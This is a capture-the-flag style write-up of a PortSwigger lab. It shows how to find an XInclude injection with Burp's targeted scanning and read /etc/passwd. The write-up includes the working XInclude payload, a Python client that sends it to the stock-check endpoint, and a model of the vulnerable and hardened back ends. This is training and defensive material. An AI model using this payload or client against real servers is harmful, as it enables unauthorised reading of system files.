Discovering vulnerabilities quickly with targeted scanning — PortSwigger

This lab contains a vulnerability that enables you to read arbitrary files from the server. To solve the lab, retrieve the contents of /etc/passwd within 10 minutes | Approach

Karthikeyan Nagaraj
InfoSec Write-ups


Let’s start. The lab has to be solved within 10 minutes, so the whole point is to scan only the request that matters instead of crawling and auditing the entire site.

Open the lab through Burp Suite with the Proxy on and Intercept off, so the traffic is simply recorded in the HTTP history. Use the stock-check function on a product page to generate the request we want to test.

In the HTTP history of the Proxy tab, notice the POST request to /product/stock. Its productId parameter (sent in the request body) is the input worth testing, because it is handled by a separate back-end component rather than by the ordinary page rendering.

  • Right-click the /product/stock request and choose Do active scan. Scanning this single request keeps the scan well inside the time limit.
  • While the scan runs, you can also try a few different values for the parameters by hand and watch how the response changes.

The scanner reports an Out-of-band resource load issue on /product/stock, in the productId parameter.

Burp’s description of the issue: it is possible to induce the application to retrieve the contents of an arbitrary external URL and return those contents in its own response. What that tells us here is that the parameter value is being parsed as XML on the back end, and a parser that fetches URLs for us will usually also honour an XInclude directive, which lets us point it at a local file instead of an external host.

  • Send the request to Repeater.
  • Replace the value of the productId parameter with the payload below and leave the other parameter as it is:
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>
  • If the server rejects the request, select the payload in Repeater and URL-encode it (Ctrl+U) so the quotes, slashes and equals signs in the XML do not confuse the form parser.

Send the request. The response now contains the contents of /etc/passwd (look for lines of the form root:x:0:0:...), and the lab is marked as solved. If you get an XML parsing error instead, check that the xmlns:xi namespace declaration survived intact and that the payload was encoded.
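To see why the payload works, here is an added example (not code from the lab or from this write-up) that models the back end behind /product/stock. The lab does not publish its server code, so vulnerable_stock_check() is an assumed reconstruction of the pattern the payload relies on: user input concatenated into an XML document that is then run through an XInclude processor. The hardened_stock_check() beside it shows the two fixes that close the hole, and send_stock_check() sends the same POST that Repeater sends; the lab URL, the storeId parameter name and the fake passwd file are all assumptions for the example.

```python
"""Added example: a model of the XInclude injection behind the lab's
/product/stock endpoint, plus a client that sends the write-up's payload.

Not code from the lab or the write-up. vulnerable_stock_check() is an
assumed reconstruction of the server-side pattern: input concatenated into
an XML document that is then XInclude-processed."""
import os
import re
import tempfile
import xml.etree.ElementTree as ET
import xml.etree.ElementInclude as EI
from urllib.parse import urlencode
from urllib.request import Request, urlopen
from xml.sax.saxutils import escape

XI_NS = "http://www.w3.org/2001/XInclude"


def build_xinclude_payload(href: str) -> str:
    """The payload from the write-up, parameterised on the href
    (file:///etc/passwd in the lab)."""
    return (f'<foo xmlns:xi="{XI_NS}">'
            f'<xi:include parse="text" href="{href}"/></foo>')


def vulnerable_stock_check(product_id: str, store_id: str) -> str:
    """Assumed vulnerable back end: raw input is concatenated into XML and the
    document is XInclude-processed, so an injected xi:include is expanded.
    xml.etree.ElementInclude's default loader open()s the href as a local
    path; lxml's xinclude() also resolves file:// URLs like the lab payload."""
    doc = (f"<stockCheck><productId>{product_id}</productId>"
           f"<storeId>{store_id}</storeId></stockCheck>")
    root = ET.fromstring(doc)
    EI.include(root)  # expands every xi:include anywhere in the document
    return "".join(root.find("productId").itertext())


def hardened_stock_check(product_id: str, store_id: str) -> str:
    """Hardened version: markup characters in the input are escaped so it
    stays text, and no XInclude processing runs on a document built from
    untrusted data."""
    doc = (f"<stockCheck><productId>{escape(product_id)}</productId>"
           f"<storeId>{escape(store_id)}</storeId></stockCheck>")
    root = ET.fromstring(doc)
    return "".join(root.find("productId").itertext())


PASSWD_LINE = re.compile(r"^([^:\s]+):[^:]*:\d+:\d+:", re.M)


def passwd_users(text: str) -> list:
    """Usernames from /etc/passwd-style lines: a quick check that a response
    really contains the file rather than an error page."""
    return [m.group(1) for m in PASSWD_LINE.finditer(text)]


def send_stock_check(lab_url: str, product_id: str, store_id: str = "1") -> str:
    """Sends the same POST that Repeater sends. lab_url is assumed to be the
    lab's web-security-academy.net origin; this needs network access."""
    body = urlencode({"productId": product_id, "storeId": store_id}).encode()
    req = Request(lab_url.rstrip("/") + "/product/stock", data=body, method="POST")
    with urlopen(req, timeout=15) as resp:
        return resp.read().decode("utf-8", "replace")


# Constructed stand-in for /etc/passwd so the demo runs without touching
# the real file.
FAKE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
               "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
               "carlos:x:1001:1001::/home/carlos:/bin/bash\n")


def run_demo() -> dict:
    """Runs the payload against both back ends and returns what each leaked."""
    fd, path = tempfile.mkstemp(suffix=".passwd")
    with os.fdopen(fd, "w", encoding="utf-8") as fh:
        fh.write(FAKE_PASSWD)
    try:
        payload = build_xinclude_payload(path)
        leaked = vulnerable_stock_check(payload, "1")
        safe = hardened_stock_check(payload, "1")
    finally:
        os.unlink(path)
    return {"leaked": leaked, "leaked_users": passwd_users(leaked),
            "safe": safe, "safe_users": passwd_users(safe)}


if __name__ == "__main__":
    result = run_demo()
    print("vulnerable back end returned:\n" + result["leaked"])
    print("users recovered:", result["leaked_users"])
    print("hardened back end returned:", result["safe"])
```

Run it as a script to see the vulnerable model return the fake passwd file while the hardened one returns the payload as inert text. Against the real lab, pass the lab origin and build_xinclude_payload("file:///etc/passwd") to send_stock_check() and run passwd_users() over the response to confirm the read worked.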

Feel free to ask queries via LinkedIn and to buy me a coffee : )

Thank you for Reading!!

Happy Hunting ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng
